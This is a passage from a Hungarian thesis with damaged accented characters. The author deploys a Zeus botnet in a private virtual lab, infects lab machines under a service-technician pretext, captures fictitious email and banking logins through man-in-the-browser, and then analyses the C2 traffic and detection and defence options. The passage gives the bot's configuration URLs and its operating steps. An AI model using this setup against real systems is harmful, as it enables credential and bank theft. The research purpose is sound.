Ez elz fejezetekben bemutattam, hogy hogyan is sikerl bezemelnem a Zeus-t, mkdik az mySQL adatbzis ahol az adatokat trolom, mkdik a vezrl panel, ahonnan a botokat tudom irnytani s a jelentseket megtekinteni, s mkdik a bot kliens is, aminek segtsgvel meg tudom fertzni az ldozat gpt. A kvetkez alfejezetekben bemutatok egy virtulis hlzatot, amit megfertzk s bemutatom a Zeus leghatkonyabb s legkzkedveltebb lopsi mdszert, a bngszben llst (Man in the browser-t). Majd miutn sikerlt ellopnom az adatokat, elemzem a Zeus-t, megvizsglva, hogy mit is csinlt s hogyan is mkdik.

8.6.1 Bot elksztse


A bot kliens bezemelse cm fejezetben bemutatott bot kliens elksztshez szksges instrukcikat kvetve belltottam azt az a bot kliens-t, amellyel megfertzm a virtulis hlzatomban lv szmtgpeket. A config.txt fjlban belltom azokat a belltsokat, amelyek szksgesek ahhoz, hogy a zombi gp kommuniklni tudjon a szerveremmel. Ezek a belltsok a kvetkezek: url_config: http://192.168.56.103/config.bin encryption_key: secret key 70

url_loader: http://192.168.56.103/bot.exe url_server: http://192.168.56.103/gate.php file_webinject: http://192.168.56.103/webinjects.txt

8.6.2 Bot eljuttatsa s megfertzse a cl szmtgpet


Az elksztett bot kliens-t el kell juttatnom az ldozat gpre s futtatni kell azt. n egy kzkedvelt social engineering mdszert alkalmazva juttatom el az ldozat gpekre a kros kdomat. Ttelezzk fel, hogy a megfertzend virtulis hlzat egy kis cg hlzata. A cgnek 5 darab szmtgpe van, amibl 4 db szmtgpet hasznlnak az alkalmazottak, a vezet pedig egy laptopot hasznl. n, mint hacker gy kerlk a szmtgpek kzelbe, hogy egy szervizben dolgozok s a cg ezzel a szervizzel van szerzdsben. Hlzati problma jelentkezett a cgnl, ezrt felvette a kapcsolatot szervizzel. n, mint szervizes kollga s mint hacker kimegyek a telephelykre, hogy megjavtsam a hlzatukat, mikzben felteleptettem a szmtgpekre a Zeus botomat is. Ezzel a mdszerrel sikeresen megfertztem mind az t szmtgpet.

8.6.3 Bot hasznlata


Miutn megfertztem a szmtgpeket, a vezrl panel-ben megjelent az sszes fertztt gp. Ahogy a 63. brn is lthatjuk, az informcis dobozban megjelent mind az t zombi gp. Az is lthat, hogy az 5 gpbl 4 j gp s 1 pedig mg rgebben lett megfertzve. Ez a bot kliens a Bot bezemelse cm fejezetben bekapcsolt kliens.

63. bra Vezrl panelben informcik a gpekrl

A 64. brn lthat a vezrl panelben az opercis rendszerek listja, 3 gpen Windows 7 s 2 gpen pedig Windows XP opercis rendszer van. 71

64. bra Megfertztt gpek opercis rendszerei

Ksztettem az egyik gprl egy jelentst s kpernymentst (65. bra). Az bra fels rszen tallhatak a szmtgprl s a bot-rl az ltalnos informcik, alatta pedig a kpernykp mentse. A kpernykpen lthat, hogy elindtottam egy parancssort, amelyben futtattam egy ipconfig parancsot, aminek eredmnye ugyanaz az IP cm, mint amit a kp felet ltunk. A Zeus bot ksztse cm fejezetben bemutattam, hogy zsb.exe nev alkalmazssal tudjuk elkszteni a fertz botunkat s ezzel a programmal tudjuk leellenrizni ha, tudjuk a kulcsot, hogy van-e ilyen bot a szmtgpen. Ezt lthatjuk is az bra kzepn: jelenleg is fut a bot a megfertztt gpen.

65. bra Bot informci a 109-es gprl

Informci lops Zeus segtsgvel Most mr lthat, hogy a megfertztt szmtgpekrl megfelelen megrkeznek az adatok a szerverhez, gy brmilyen online tevkenysg folyik a zombi gpen, azt a bot elkldi a szervernek s a szerver eltrolja azt az adatbzisban. A 66. brn lthat a megfertztt gpek listja. 72

66. bra Megfertztt gpek listja

Az egyik alkalmazott brbe bjva bemutatom, hogy mikkppen ltom majd az adatokat a szerveren. Az alkalmazott a 192.168.56.106 IP-cmmel rendelkez zombi gpen fog Internet Explorer segtsgvel levelez alkalmazsokat hasznlni, valamint online banki tevkenysgeket vgezni. A vezrl panel-en lthat lesz majd, hogy hiba trtnt a kommunikci a zombi gp s a kiszolgl kztt titkostva, azokat az adatokat, amelyekre kvncsiak voltunk mind hinytalanul megkaptuk. Ilyen adatok voltak a felhasznlnevek s a hozz tartoz jelszavak. Az online bankozsnl csak azokat az informcikat tudjuk meg, amik szksgesek a belpshez s az elsdleges azonostshoz, mert ez a verzij Zeus mg nem kpes megszerezni a telefonra visszakldtt msodlagos azonostshoz szksges kulcsot. Elszr bemutatom az e-mailek hasznlatt, utna pedig az online bankozsokat. Az emailek kztt van olyan is, ami nem titkostva kommunikl. Mindezzel szeretnm bemutatni, hogy a titkosts irrelevns. A vizsglatok sorn kizrlag fiktv adatokat hasznltam fel Nem titkostott e-mail-ek A 67. s a 68. brn lthat egy-egy jelents, amiben egy Freemail s egy Citromail bejelentkezs tallhat. Mindkt esetben megtallhat a (user) vagyis a felhasznl s a (passwd) vagyis a felhasznlhoz tartoz jelsz.

73

67. bra Citromail adatok

68. bra Freemail adatok

Titkostott e-mail Napjainkban az egyik legkzkedveltebb ingyenes e-mail szolgltat a Gmail (www.gmail.com). Ez az e-mail szolgltats mr vek ta titkostva (SSL) kommunikl, de 74

mint lthatjuk a 69. brn ez nem neheztette meg a Zeus bot dolgt. Itt is megtallhat a felhasznlnv s a felhasznlhoz tartoz jelsz. Ez a kt adat segtsgvel mris be tudunk lpni a felhasznl fikjba. Ez nmagban nem olyan veszlyes, mert csak egy email fik, de tartalmazhat olyan informcikat, pldul fontos levelezseket, cmeket, neveket, amelyek ha nyilvnossgra vagy ms cghez kerlnek, akkor kompromittlhatjk a valdi tulajdonost, s igen nagy vesztesgeket szenvedhet el a felhasznl.

69. bra Gmail adatok

G-mail belpshez szksges adatok a 69. brn lthatak.

75

Banki belpsek Az emberek tbbsge nap, mint nap hasznlja a bankok ltal nyjtott online bankozs lehetsgeit. A Zeus nagy elterjedst ennek a banki funkcinak ksznheti. A 192.168.56.106 IP-cm gpen egy OTP belpst szimulltam (70. bra), a belpshez szksges adatokat bertam. Ezek nem vals adatok, de ez a tesztelst nem befolysolja.

70. bra OTP online bankozs

A 71. brn lthat, hogy a szmlaszm az azonost s a jelsz is kiolvashat. Ha ezek az adatok helyesek lennnek, akkor most a botgazda minden gond nlkl - ha nincs msodlagos azonosts bekapcsolva- be tudna lpni s akr tranzakcit is tudna kezdemnyezni. A 72. s 73. brn is jl lthat, hogy ms bankoknl is mkdik ez a mdszer gy a K&H s az Erste online bankozsi funkcijt hasznlva megkapjuk azokat az adatokat amelyekre szksgnk van.

76

71. bra OTP banki adatok

Tovbbi banki adatok K&H bank s az Erste bank online bankozsnl is ugyangy megszereztem azokat az informcikat, amelyekre szksgem volt (72. s 73. bra).

77

72. bra K&H banki adatok

78

73. bra Erste banki adatok

8.6.4 A kinyert informcik feldolgozsa, elemzse


Ahogy lthattuk az elz rszekben sikeresen meg tudtunk szerezni minden olyan informcit a Zeus bot segtsgvel, amelyeket ksbb felhasznlva anyagi haszonra tudunk szert tenni. A kiberbnzk ezt a mdszert hasznlva gyjtik be a klnbz terletekrl az adatokat s adjk el ms bnzknek, akik ezekkel az adatokkal visszalve nagy anyagi haszonra tesznek szert. Ezeket az adatok nagyttelben (10-100.000 db), kisebb-nagyobb sszegrt cserlnek gazdt.

8.7 Zeus elnyei


Zeus egyik nagy elnye abban rejlik, hogy a kezelse nagyon egyszer s kzenfekv, ha a felhasznlnak megvan az alap informatikai tudsa. Egy j helyre helyezett szerver segtsgvel, knnyen lehet irnytani a zombi gpeket. 79

Tbb szz vltozat kering az interneten ezrt a Zeus bot felismerse illetve botgazda s a szerver megtallsa igen nehz lehet. Rengeteg internetes weboldalon lehet brelni Zeus botnet hlzatokat a pr szz szmtgpbl ll hlzattl akr a tbb szzezer gpbl ll hlzatig. Man in the Browser tpus tmadsi forma hasznlata, azaz a bot bell a bngszbe, gy a bngsz hiba kldi titkostva az adatokat a szervernek, mg titkosts eltt a bot mr elkapja s elkldi a vezrl panelnek az adatokat. Az jabb verzik mr tmogatjk a msodlagos azonost megszerzst is, s nem csak Windows opercis rendszereken hasznlhat, hanem Android, Blackberry, Symbian, Windows Mobil platformokon is mkdik.

8.8 Zeus htrnyai


Bizonyos feladatokra hasznlhat csak, ez egyben nemcsak htrny, hanem elny is mivel, hogy clzott feladatokra talltk ki, gy ezeket egyszer szoftveres felpts jellemzi s kezelsk is ezltal egyszerbb. A rgebbi verzik, amelyek nylt forrskddal rendelkeznek, csak Windows opercis rendszereken hasznlhatak.

80

9 Az elrt eredmnyek kielemzse


Amint lthat volt, mg ezzel a rgi Zeus verzival is sikerlt megszerezni azokat az informcikat, amiket clknt kitztnk magunk el. A szakdolgozat rsa kzben sikerlt bezemelni a Zeus szervert, ahol megtallhat a vezrl panel s a hozz tartoz adatbzis, a virtulis hlzatban tkletesen kommuniklnak a szmtgpek egymssal. Sikerlt a kapcsolatot megteremteni a zombi gpek s a szerver kztt, az ellopott informcikat eltrolni a mySQL adatbzisban. Az eltrolt adatokbl jelentseket lehet kszteni, amibl kiolvashat szmunkra az sszes olyan informci, amire szksgnk van. Az ldozati gpen vgbemen SSL titkostst hasznl online bankozsi adatokat is sikerlt megszerezni.

81

10 Zeus kommunikci analizlsa


Hlzati forgalmat figyelve Az egyik ldozati gpre teleptettem egy Wireshark hlzati forgalomelemz programot, hogy meg tudjam vizsglni miknt derthet fel ez a Zeus vltozat a megfertztt szmtgpen. Mg a szerver bezemelse kzben a Backtrack opercios rendszeren hasznltam ezt a programot ahhoz, hogy a kommunikcit helyre tudjam lltani a szerver s a kliens gp kztt. A szerver gp hlzat figyelsvel lthat volt a kommunikci a zombi gp s a szerver kztt. Amikor elindtottam az ldozati gpen a bot.exe fjlt, hogy megfertzzem a szmtgpet, akkor a 192.168.56.106-os IP-cm ldozati gp felvette a kapcsolatot a 192.168.56.103as IP-cm szervernkkel s a szervertl lekrte a config.bin fjl tartalmt (74. bra).

74. bra Wireshark config.php

Amikor sszelltom a folyamot (75. bra), a szerver elkldi a zombi gpnek egy GET metdus hasznlatval a config.bin fjl tartalmt. A tartalma szmunkra ismeretlen, mert a kommunikci titkostsra a Zeus RC4 kdolst hasznl. A Zeus bot az RC4 kulcs ismeretben sikeresen tudja dekdolni a config fjl belltsait a sajt alkalmazsnak belltsaink vltoztatsra. Ezzel a bot alkalmazsnak belltsai megtrtntek, ettl kezdve a botnak csak az ellopott adatot kell kldeni a szervernek, majd a szerver eltrolja az adatbzisba. [10] [11] [23]

82

75. bra Config.php sszealtsa a wiresharkban

A hlzat figyels folyamn szrevehet, hogy a gate.php-n keresztl a kliens rendszeresen kldi az adatokat a szerver irnyba, gy a Zeus forgalmazsa a hlzatbl kiszrhet. A Zeus forgalmnak rejtst nem kpezi a dolgozat (76. bra).

76. bra Wireshark gate.php

Amikor sszelltottam a gate.php folyamot (77. bra) akkor lthat, hogy a zombi gp (192.168.56.106) POST metdus hasznlatval kldi a szerver (192.168.56.103) fel az adatokat RC4 kdolssal. Teht nem csak a szervertl kldtt adatok vannak kdolva, hanem a zombi gp ltal kldtt adatok is.

83

77. bra Gate.php sszealtsa a wiresharkban

Megfelel hlzati forgalomfigyelsi mdszerekkel knnyen detektlhat ez a fajta Zeus verzi, ha alaprtelmezett belltsait hasznljk. Fut folyamatokat figyelve Most nzzk meg egy kicsit ms szemszgbl: nem a hlzati forgalmat figyelve, hanem a fut folyamatokat vizsglva, hogy vajon felfedezhet-e valahol a Zeus bot. A Sysinternalstl a TCPview program segtsgvel vizsglom meg a fertztt gpen a fut folyamatokat. A Windows beptett feladatkezeljvel megnzve a fut folyamatokat, nem tallunk gyans folyamatot (78. bra).

84

76. bra Windows Feladatkezel

A TCPview ltal megmutatott fut alkalmazsokbl (79. bra) sem tnik fel semmi klns program. Annyi vlhetnk felfedezni, hogy van egy taskhost.exe ami a 192.168.56.103 IP-cmen lv gppel kommunikl, de ebben az esetben tudjuk, hogy a 192.168.56.103-as IP-cm a szerverem cme. Ha kls szemlyknt vizsglja valaki ezeket a fut alkalmazsokat, akkor ezen a tnyen knnyen tsiklik.

85

77. bra TCPview folyamatok

A szmtgp indtsakor a Microsot Windows regisztrlja az sszes szksges DLL fjlt s futtatja azokat a szolgltatsokat, amelyek szksgesek a DLL fjlhoz. A taskhost.exe az sszes DLL alap szolgltats folyamatt ellenrzi. Ez szerves rsze a Windows opercis rendszereknek. A Windows opercis rendszerek ezt a fjl-t akr tbb pldnyban is futtathatjk attl fggen, hogy mennyi erforrs ignye van a DLL fjl- szolgltatsnak. Ha tbb taskhost.exe fjl fut egy idben, akkor a Windows megkeresi azt, amelyik tartalmazza a szksges adatot a szolgltats futtatshoz. Lthatjuk, hogy a fut folyamatok kztt a Zeus bot elrejtzkdtt, nem lelhet fel, hiszen amikor elindtjuk a botot, akkor egy ismert, Windows ltal hasznlt fut alkalmazsba pl be s mkdik. Megvizsglom az ldozati gpen fut folyamatokat gy is, hogy kzben felteleptem r a Zeus bot klienst. A 80. brn lthat, amikor elindtom a bot.exe-t, hogy megjelenik a fut folyamatok kztt. Csak pr msodpercig lthat a bot.exe, mert amint felteleptette magt a megfelel helyre azonnal trli a fertzsre alkalmas bot.exe fjl-t, gy tntetve el a nyomokat maga utn.

78. bra Windows Feladatkezel idpontjban

86

Ugyancsak a TCPview program segtsgvel megvizsglom, hogy mi trtnik a telepts idpontjban. ltalban egy darab taskhost.exe fjl van a fut folyamatok kztt. Amikor elindtottam a bot.exe fjlt, akkor a Zeus beplt az opercis rendszerbe s indtott magnak mg 3 darab taskhost.exe-t, amibl egyet le is allt amint vgzett a bot teleptsnek folyamatval. Ezek szerint, amikor a Zeus bot-ot felteleptjk, akkor ltrehoz magnak kett darab taskhost.exe-t amin keresztl tud mkdni s elrejtzik a kvncsi szemek ell.

79. bra TCPview fertzs idpontjban

Listzzuk ki a taskhost.exe fjl tartalmt, htha tallunk valamit a Zeus bottal kapcsolatban. Ehhez a tasklist.exe /m parancsot hasznltam a cmd.exe alkalmazsban. A taskhost.exe fjl tartalmban sem tallunk semmilyen utalst a Zeus bot jelenltre (82. bra). Vlemnyem szerint ez igen j teljestmny egy relatv rgi Zeus verzitl, tekintettel arra, hogy nem fordtottam energit az elrejtsre.

80. bra Tasklist lekrdezse a megfertztt gpen

87

11 A vdekezs fajti
A vdekezs nem merl ki a szmtgpre teleptett antivrus vagy antispy program hasznlatval. Sajnos az esetek tbbsgben a gp megfertzdse a felhasznl figyelmetlensgnek, jhiszemsgnek s hanyagsgnak kihasznlsn alapul. Az antivrus programok hasznlata nem nyjt teljes kr vdelmet, de a vdekezs egyik j alapkve lehet, ha kell figyelmet fordtunk a vdelmi szoftverek napra kszen tartsra is. Manapsg az antivrus programok szzt tallhatjuk meg a piacon, amelyek kztt lteznek ingyenesek is s fizetsek is. A fizetsk tbbsgnek van ingyenesen kiprblhat verzija is, amit brki letltheti a gyrt honlapjrl s hasznlhatja bizonyos idintervallumban. Ezek az gynevezett tril antivirus programok hasonl biztonsgot nyjtanak, mint a megvsrolt verzijuk. A msodik j alapk a tzfalak hasznlata, legyen az hardveres vagy szoftveres. Nagyon hatkonyan lehet vele portok hasznlatt szablyozni. Vgezetl, de nem utols sorban, fontos alapknek tekinthet a naprakszen frisstett, jogtiszta opercis rendszer. Legyen sz Linux, Windows, Mac OS, vagy egyb ms opercis rendszerrl. A botnetek s az egyb vrusok nagy rsze ell a Mac OS s a Linux opercis rendszer is mr nagyobb vdelmet tud nyjtani, mint a Windows opercis rendszer, mert a vrus rok, a tmeget clozzk meg s a felhasznlk nagy rsze valamilyen Windows opercis rendszer vltozatot hasznl (83. bra).

83. bra Opercis rendszerek eloszlsa 2013-ban (Forrs: Wikipdia)

88

12 Irnyvonalak s a jvkp
A botnetek terjedse nvekv tendencit mutat, egyre nagyobb krt okozva az informatikai eszkzk felhasznlinak. Ahogy az emberek egyre jobban tmaszkodnak ezekre az eszkzkre, a bnzk is egyre nagyobb lehetsget ltnak ezek feltrsben. A botnetek fejldse sorn lthat, hogy ezek egyre tbb eszkzt kpesek megfertzni, ezen kvl egyre tbb kpessget tudnak sikeresen hasznlni. A botok kezdetben meglehetsen korltozott funkcionalitssal brtak, mostanra mr ezzel szemben eszkzeinket megfertzve kpesek minden szemlyes adatunkat ellopni, erforrsainkat kihasznlni, spam levelekkel bombzni msokat s minket, tovbb elosztott szolgltatsmegtagadsos tmadst indtani szerverek ellen. Az is szrevehet, hogy mg rgen az IRC protokoll segtsgvel a kzponti vezrlsen alapul rendszereket rszestettek elnyben, manapsg mr a P2P (Peer-to-Peer) technikt hasznljk a botok irnytsra. [13] [16] Ezeket a rosszindulat kdokat azrt ksztik el a programozk, hogy egy bot tbbrt feladatokat is el tudjon ltni, tovbb a botot hasznl szemly kilte titokban maradhasson. Ebbl kvetkezik, hogy a botok fejldse ebbe az irnyba fog tovbbfejldni, teht a programozk olyan botokat fognak kszteni, amelyek titkostott vezrl csatornt hasznlnak, a lehallgatson s a mintakeressen alap felderts elkerlsnek rdekben. Azokat a vdelmi szoftvereket, amelyek viselkedsi s statisztikai megfigyelsek alapjn mkdnek, az jgenercis botok gy fogjk kikerlni, hogy a protokollokat s a portokat klnfle technikkkal s mdszerekkel sszekeverik vagy elrejtik a vdelmi alkalmazs ell. Tovbb a statisztikai vizsglatok elkerlse rdekben olyan megoldsokat alkalmaznak, amelyekkel a parancsokat hordoz zenetek bonyolultsgt lehet fokozni. A jelenleg is hasznlatban lv ltalnos informatikai eszkzkn (szemlyi szmtgp, laptop, notebook, okos telefon) tl a botok olyan eszkzket is kpesek lesznek megfertzni, amelyek mg csak most kezdenek elterjedni a vilgban. Ilyen eszkzk lehetnek pldul az okos televzik, tblagpek, a televzikhoz csatlakoztathat mikroszmtgpek, autkban lv clszmtgpek, gyrakban lv robotrendszerek vezrli, stb... A szakdolgozatomban mr bemutatott ZitMo krtkony alkalmazs is altmasztja, hogy a botok rohamos fejldsnek indultak. A botnetekkel kapcsolatos felgngyltett s kzztett bnesetekbl egyrtelmen ltszik, hogy a botnetekre ptett, ezekkel elkvetett visszalsek s tmadsok napjaink szerves rszv vltak s felteheten j darabig mg azok is maradnak. 89

13 sszefoglals
Szakdolgozatom rsa folyamn ltalnossgban bemutattam a botnet hlzatok kpessgeit, hasznlati mdjait, elterjedst. Majd szktve a krt, bemutattam a Zeus botnet egyik vltozatnak kpessgeit. Ezt kveten ltrehoztam egy hat szmtgpbl ll virtulis hlzatot, amelybl t munkalloms egy klnll kisvllalati hlzati rendszert szimullt. A vllalati hlzatot megfertztem egy Zeus botnet-tel amit sajt magam, a mr meglv nylt forrs fjlokbl ksztettem el s megteremtettem azokat a feltteleket, amelyek szksgesek a botnet mkdshez s zemeltetshez. A megfertztt szmtgpekbl egyet kiragadva bemutattam a Zeus egyik legnpszerbb s taln lehet gy is mondani, hogy a legfontosabb funkcijt, az ember a bngszben (Man in the Browser) alap tmadst. Ennek segtsgvel olyan adatokat lehet ellopni az ldozat gprl, amelyeket ksbb a szmtgp titkost. Ilyen adatok lehetnek a banki tranzakcikhoz szksges azonostk, felhasznlnevek, jelszavak, stb... A szimulciban ezeket a titkostott adatokat sikerlt ellopnom az ldozat gprl. A kvetkeztetsek levonsa utn sszegeztem az eredmnyeket, elemeztem a Zeus botot, hogy hogyan s milyen mdszerek llnak rendelkezsemre, hogy a krtevt megtalljam a megfertztt szmtgpen. Majd lertam, hogy milyen bevett mdszerekkel vdekezhetnk az ilyen tpus tmadsok ellen. A Zeus forrskd, amit felhasznltam a szakdolgozatom rsa sorn, tkletesen alkalmas volt arra, hogy mind informatikai, mind adatbiztonsgi szemszgbl, s vgl egyszer informatikai felhasznlknt is bemutassam ezt a veszlyforrst. Az orosz fejleszt megltta a piaci rst a kibertr fekete piacn, felismerte azt a tnyt, hogy nem csak az ellopott informcinak van pnzbeli rtke, hanem a Zeus ltal megfertztt hlzatokat is el lehet adni. A mindennapi letben hasznlt szoftver, mint szolgltats (Software as a Service) mintjt kvettk, amit mr tbben gy hvnak, hogy krtkony kd, mint szolgltats (Crimeware as a Service). Majd ksbb, amikor egyre tbb botnet jelent meg a vilghln, a Zeus ksztje nyilvnossgra hozta a krtev forrskdjt, hogy a klnbz kalzvltozatok kztt elvegyljn a tmegben. A rohamosan fejld vilg szinte rknyszerti az embert arra, hogy minl nagyobb mrtkben tmaszkodjanak informatikai eszkzkre, az ltaluk nyjtott szolgltatsokra. Ennek kvetkezettben viszont fggnek is ezen eszkzktl. A bankban tartott pnzkkel,

90

szemlyes adatainkkal, magn leveleinkkel s az eszkzeink erforrsaival kell fizetnnk a biztonsgosnak hitt rendszerek buksa esetn.

91

14 Irodalomjegyzk
[1] Hackin9 magazin: BOTNET Issue PC a Zombie? Issue 5/2011 (S) ISSN: 1733-7186 [2] Hackin9 magazin: The guide to Backtrack Issue 03/2012(3) ISSN: 1733-7186 [3] Ethical Hacking and Countermeasures v7.1, Courseware, EC-COUNCIL OFFICIAL CURRICULUM, 01 Module, Introduction to Ethical Hacking, 1-34 oldal [4] Ethical Hacking and Countermeasures v7.1, Courseware, EC-COUNCIL OFFICIAL CURRICULUM, 02 Module, Footprinting and Reconnaissance, 35-80 oldal [5] Ethical Hacking and Countermeasures v7.1, Courseware, EC-COUNCIL OFFICIAL CURRICULUM, 03 Module, Scanning Networks, 81-138 oldal [6] Ethical Hacking and Countermeasures v7.1, Courseware, EC-COUNCIL OFFICIAL CURRICULUM, 06 Module, Trojans and Backdoors, 251-302 oldal [7] Ethical Hacking and Countermeasures v7.1, Courseware, EC-COUNCIL OFFICIAL CURRICULUM, 10 Module, Denial os Service, 433-468 oldal [8] Ethical Hacking and Countermeasures v7.1, Courseware, EC-COUNCIL OFFICIAL CURRICULUM, 16 Module, Evading IDS, Firewalls,and Honeypots, 753-804 oldal [9] Ethical Hacking and Countermeasures v7.1, Courseware, EC-COUNCIL OFFICIAL CURRICULUM, 19 Module, Penetration Testing, 865-904 oldal [10] Ethical Hacking and Countermeasures LAB MANUAL v7.1, EC-COUNCIL OFFICIAL CURRICULUM, 06 Module, Trojans and Backdoors, 291-333 oldal [10] Ethical Hacking and Countermeasures LAB MANUAL v7.1, EC-COUNCIL OFFICIAL CURRICULUM, 06 Module, Detecting Trojans, 334-360 oldal [11] System Forensics http://sysforensics.org/2012/03/zeus-v2-malware-analysis-parti.html [12] Steven Musil, Eurograbber attack,2012 :http://news.cnet.com/8301-1009_357557434-83/zeus-botnet-steals-$47m-from-european-bank-customers/ [13] Brett Stone-Gross, Dell SecureWorks Counter Threat Unit(TM) Threat Intelligence,2012,: http://www.secureworks.com/cyber-threatintelligence/threats/The_Lifecycle_of_Peer_to_Peer_Gameover_ZeuS/ [14] Denis: Kaspersky Lab Expert, New ZitMo for Android and Blackberry, 2007: http://www.securelist.com/en/blog/208193760 [15] Andrea Lelli, Zeusbot/Spyeye P2P updateed Fortifying the Botnet, 2012: http://www.symantec.com/connect/blogs/zeusbotspyeye-p2p-updated-fortifying-botnet 92

[16] Derek Jones, Fingerprinting the author of the Zeus Botnet, 2011: http://shape-ofcode.coding-guidelines.com/2011/05/11/fingerprinting-the-author-of-the-zeus-botnet/ [17] Buherator, 2011: http://buhera.blog.hu/2011/05/16/zeus_1 [18] PTA CERT HUNGARY: A Zeus forrskdjnak elterjedstl tartanak a kutatok, 2011: http://tech.cert-hungary.hu/tech-blog/110404/a-zeus-forraskodjanak-elterjedesetoltartanak-a-kutatok [19] PTA CERT HUNGARY: A Zeus trjao minden 50 szmtgpbl egyet mr megfertztek, 2012: http://tech.cert-hungary.hu/tech-blog/110404/a-zeus-forraskodjanakelterjedesetol-tartanak-a-kutatok [20] PTA CERT HUNGARY: Csak gazdagoktl lopottegy automatizlt banki csals, 2012: http://tech.cert-hungary.hu/tech-blog/120628/csak-gazdagoktol-lopott-egyautomatizalt-banki-csalas [21] NET SECURITY, Zeus malware strain infecting 1 in 50 PC, 2012: http://www.netsecurity.org/malware_news.php?id=2161 [22] H.Binsalleeh, T.Ormerod, A. Boukhtouta, P. Sinha, A. Youssef, M.Debbabi, L. Wang,2012: On the analysis of the Zeus Botnet crimeware toolkit: http://www.ncfta.ca/papers/On_the_Analysis_of_the_Zeus_Botnet_Crimeware.pdf [23] IOActive Comprehensive Computer Security Service,2012: http://www.ioactive.com/pdfs/ZeusSpyEyeBankingTrojanAnalysis.pdf [24] Symantec Security Response, Zeus: King of the Bots, 2009: http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/z eus_king_of_bots.pdf [25] James Wyke, Threat Researcher, SophosLabs UK, What is Zeus? ,2011: http://www.sophos.com/medialibrary/PDFs/technical%20papers/Sophos%20what%20is%2 0zeus%20tp.pdf [26] Trend Micro, Incorporated, Zeus: A persistent criminal Enterprise ,2010: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/whitepapers/wp_zeus-persistent-criminal-enterprise.pdf [27] Derek Manky, FortiGuard Center, Theat Research & Response: Zeus: God of DIY Botnets,2011: http://www.fortiguard.com/legacy/analysis/zeusanalysis.html [28] Bevezets a botnetek vilgba, Szentgyrgyi Attila, Szab Gza, Bencsth Boldizsr, 2008: http://www.hiradastechnika.hu/data/upload/file/2008/2008_11/HT0811_4.pdf [29] http://hu.spam.wikia.com/wiki/Botnet 93

[30] Szentgyrgyi Attila, Szab Gza, Bencsth Boldizsr, Bevezets a Botnetek vilgba: http://www.crysys.hu/~szabog/index_files/botnet_draft_acc.pdf [31] http://krebsonsecurity.com/2010/04/a-closer-look-at-rapport-from-trusteer/ [32] Harangi Lszl, 2010: http://techcorner.hu/pcworld/230-milliot-lopott-a-zeus-v3botnet.html , hivatalos oldal https://www.trustwave.com/spiderLabspapers.php?utm_source=referrer&utm_medium=website&utm_content=m86website&utm_campaign=M86-Rdr [33] http://en.wikipedia.org/wiki/Waledac_botnet [34] http://en.wikipedia.org/wiki/Kelihos_botnet [35] http://en.wikipedia.org/wiki/Rustock_botnet [36] Cory Doctorow, DDoS storm breaks records at 300Gbps , 2013: http://boingboing.net/2013/03/27/ddos-storm-breaks-records-at-3.html [37] http://en.wikipedia.org/wiki/Botnet [38] Dancho Danchev, How much does a Botnet cost?, 2013: http://threatpost.com/howmuch-does-botnet-cost-022813/ [39] http://en.wikipedia.org/wiki/Man-in-the-browser [40] http://en.wikipedia.org/wiki/Zeus_(Trojan_horse)

94

15. brajegyzet
1. bra Clzott tmads lpsei............................................................................................ 10 2. bra Bot net hlzat vsrls ........................................................................................... 19 3. bra DoS, DDoS tmads ................................................................................................ 23 4. bra Bot net mkdse .................................................................................................... 26 5. bra Zeus tracker statisztika ............................................................................................ 27 6. bra Peer to peer kapcsolat .............................................................................................. 28 7. bra Centralizlt botnetek ................................................................................................ 29 8. bra Detektls vllalati szinten ...................................................................................... 31 9. bra Hamis web oldal injekcit ....................................................................................... 37 10. bra Fertzttsg elterjedse a vilgban ........................................................................ 39 11. bra Vezrl panel fjlok a szerveren............................................................................ 41 12. bra Msodik lps, teleptsi hiba ................................................................................ 42 13. bra Msodik lps, hibakeress ................................................................................... 42 14. bra Msodik lps hiba kijavtsa ................................................................................ 43 15. bra Harmadik lps hibakeress .................................................................................. 43 16. bra Harmadik lps hibajavts .................................................................................... 44 17. bra Negyedik lps, hibakeress .................................................................................. 44 18. bra Negyedik lps, hibajavts ................................................................................... 44 19. bra Vezrl panel teleptsi ablak ................................................................................ 45 20. bra Vezrl panel teleptsi ablak kitltse ................................................................. 47 21. bra Hatodik lps hibakeress ..................................................................................... 47 22. bra Hatodik lps hibajavts ....................................................................................... 48 23. bra Hiba javtsa, vltoz definilsa .......................................................................... 48 24. bra Hetedik lps hibakeress ...................................................................................... 48 25. bra Hetedik lps hibajavtsa vltozok definilsa .................................................... 48 26. bra Nyolcadik lps hibakeresse geobase.txt ............................................................. 49 27. bra Adatbzis sikeres telepts vge ............................................................................ 49 28. bra mySQL adatbzis botnet_list tbla ........................................................................ 50 29. bra mySQL adatbzis botnet_reports tbla .................................................................. 51 30. bra mySQL adatbzis botnet_scripts tbla................................................................... 52 31. bra mySQL adatbzis botnet_scripts_stat tbla ........................................................... 53 95

32. bra mySQL adatbziscp_users tbla ............................................................................ 54 33. bra mySQL adatbzis ipvtoc tbla ............................................................................... 55 34. bra Firefox vlasz a cp.php megnytskor ................................................................... 56 35. bra Kilencedik lps hibakeress ................................................................................. 56 36. bra Kilencedik lps hiba javtsa ............................................................................... 56 37. bra Tzedik lps hibakeresse .................................................................................... 57 38. bra Tzedik lps hiba javtsa ..................................................................................... 57 39. bra Vezrl panel bejelentkez kperny .................................................................... 57 40. bra Vezrl panel men ............................................................................................... 58 41. bra Vezrl panel informcik men........................................................................... 58 42. bra Vezrl panel opercios rendszer statisztika men ............................................... 59 43. bra Vezrl panel botnet kliensek men ...................................................................... 60 44. bra Vezrl panel szkriptek listja men ..................................................................... 60 45. bra Vezrl panel jelentsek filter men ..................................................................... 61 46. bra Vezrl panel jelentsek result men .................................................................... 61 47. bra Vezrl panel informcik .................................................................................... 62 48. bra Vezrl panel rendszer informcik men ............................................................ 62 49. bra Vezrl panel felhasznl men ............................................................................ 62 50. bra Config.txt fjl tartalam........................................................................................... 64 51. bra Zeus builder alkalmazs ........................................................................................ 65 52. bra bot.exe ksztse .................................................................................................... 65 53. bra bot.exe mentse...................................................................................................... 66 54. bra Bot els kommunikcija a szerverrel, config fjl lekrse. ................................. 66 55. bra Config fjl TCP folyam sszeraksa ..................................................................... 67 56. bra Tizenegyedik lps hiba javtsa ........................................................................... 67 57. bra Wireshark gata.php kommunikci ....................................................................... 68 58. bra Gate csomag sszelltsa...................................................................................... 68 59. bra Tizenkettedik lps hiba keresse .......................................................................... 69 60. bra Tizenkettedik lps hiba a gate.php fjlban ........................................................... 69 61. bra Tizenkettedik lps hiba javtsa ........................................................................... 69 62. bra Vezrl panelben megjelentek a zombi gpek 